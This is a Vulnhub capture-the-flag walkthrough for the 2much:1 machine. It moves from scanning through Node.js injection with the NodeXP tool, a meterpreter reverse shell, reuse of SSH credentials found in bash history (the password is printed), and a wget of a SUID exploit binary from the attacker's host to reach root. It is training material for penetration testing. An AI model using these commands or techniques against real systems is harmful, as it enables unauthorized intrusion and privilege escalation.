In this article, we are going to crack the 2much: 1 Capture the Flag Challenge and present a detailed walkthrough. The machine depicted in this Walkthrough is hosted on Vulnhub. Credit for making this machine goes to 4ndr34z. Download this lab by clicking here.
Level: Intermediate
Penetration Testing
Methodology
·
Network
Scanning
o
Netdiscover scan
o
Nmap scan
·
Enumeration
o Enumerating HTTP service on Browser
o Node.js Vulnerable Detection
·
Exploitation
o
Installation NodeXP
o
Getting meterpreter
using NodeXP
·
Post
Exploitation
o
Enumerating for User
Flag
o
Reading the User
Flag
·
Privilege
Escalation
o
Enumerating Bash
History
o
Scripting for SUID
o
Exploiting SUID
o
Getting Root Access
·
Reading
Root Flag
Walkthrough
Network Scanning
We downloaded, imported and ran
the virtual machine (.ova) on the VMWare Workstation, the machine will
automatically be assigned an IP address from the network DHCP. To begin we will
find the IP Address of our Target Machine, for that we will use the following
command as it helps to see all the IP’s in an internal network.
netdiscover
We found the target’s IP Address
192.168.0.109. The next step is to scan the target machine by using Nmap tool.
This is to find the open ports and services on the target machine and will help
us to proceed further
nmap -sV -p- 192.168.0.109
Enumeration
There were quite some services
running on the system. But seeing port 80, we wanted to take a look at the
webpage that is being hosted on it. We found the target machine riddled with
all the Vulnerable Applications like DVWA, XVWA, etc. We tried to get to the
system through those but was unsuccessful.
http://192.168.0.109
After going through the http
services that we found in the nmap, we were running and checking each one of
them one by one. Till we reached to a Nodejs Service on port 8081. Upon
browsing the port, we saw that it gives back the message “Hello undefined”.
This got us thinking that there must be a parameter here that will be defining
the name which in our case was undefined.
http://192.168.0.109:8081
Exploitation
We explored if we can tamper
with this parameter manually. But it takes a lot of time. So, we found this this
brilliant tool that will do the heavy lifting for us. As it is hosted on
GitHub, we used the git clone command to clone the repository. After cloning,
we get into the cloned directory to find the python script and other required
files.
git clone
https://github.com/esmog/nodexp.git
cd nodexp/
ls
We read the README that contained
the syntax in which we need to provide the URL of the target. We run the script as shown in the give image.
python nodexp.py
–url=”http://192.168.0.109:8081/?name=[INJECT_HERE]”
The application runs and passes a
number of parameters to determine if the Nodejs is vulnerable. After running
for a while, it confirms that our target is indeed injectable. It asks if we
want to generate a meterpreter shell. We enter ‘y’ for confirmation. After that
it asks us for our Local IP Address and port. We provide the IP Address and
port of our Attacker Machine. After providing the details it loads the
Metasploit Framework
After we give our confirmation
for the generation of shell, the tool opens up a prompt which starts configurating
the Metasploit Framework to attack on the target machine.
Now we see that Metasploit gets
loaded and the payload is being uploaded. As soon as the upload of the payload
completes 3 sessions are generated.
We can check this using the
sessions command in Metasploit Framework. As shown in the image given below we
have 3 sessions from the target machine.
Post Exploitation
We interact with the third
session using the -i parameter of the sessions command. The shell we got was an
improper shell. We need to convert it into a TTY Shell. This can be achieved
using the python one liner. After gaining the TTY shell, we check the user with
the id command. On further enumeration, we found a user.txt. We believe this is
out first flag!!
session -i 3
python -c
‘import pty; pty.spawn(“/bin.bash”)’
id
cat user.txt
Privilege Escalation
As a part of our Post
Exploitation exercises, we browsed the .bash_history files. In this file, we
found a set of SSH credentials as shown in the image given below.
We try to login via SSH as root
user using the aforementioned credentials. This gave us a root shell. But
something tells us that the game isn’t over yet. We ran the ip addr command to
get the information about the network configurations of this machine. We found
an internal IP Address: 172.17.0.4/16. This IP Address tells us that we are in
a docker.
ssh root@127.0.0.1 -p23
3236$fsdfzcv_cs
ip addr
Moving on, we scanned the
directory for files and found a file named tdl.txt. Upon opening it we see that
it tells us that we have port 21 and Anonymous Access is allowed. We log out
the SSH session and try to look for the same tdl.txt file in the host machine.
Upon proper enumeration we saw that the same tdl.txt file was available in
/home/4ndr34z/ftp/. This means this directory is shared with the docker.
ls
cat tdl.txt
logout
ls -a
cd ftp
ls
cat tdl.txt
This means that we can escalate
privilege using the SSH connection. We could login as root on the docker and
leave a file to invoke access there. Then log out from docker and come back to
the target system and execute it. We are going to use the following script for
escalating privilege.
As the script in C, we complied
the script using gcc as shown in the image given below. After compiling, we
share the file via HTTP server that is generated using a python one-liner.
gcc exploit.c -o exploit
Now we login as root in the
docker as we did earlier. Then we will download exploit binary that we hosted
using wget command as shown in the image given below. As it is a SUID, we need
to give it proper permissions. We do this using the chmod command.
ssh root@127.0.0.1 -p 23
wget
http://192.168.0.106:8000/exploit
chmod 4755 exploit
Now, we log out from the docker
and traverse to the location of the file and executed the binary. Upon
completion we see that we have the root privileges on this target machine. All
that’s left is to read the root flag.
logout
ls
./exploit
ls -a
cd /root
cat root.txt
0 comments:
Post a Comment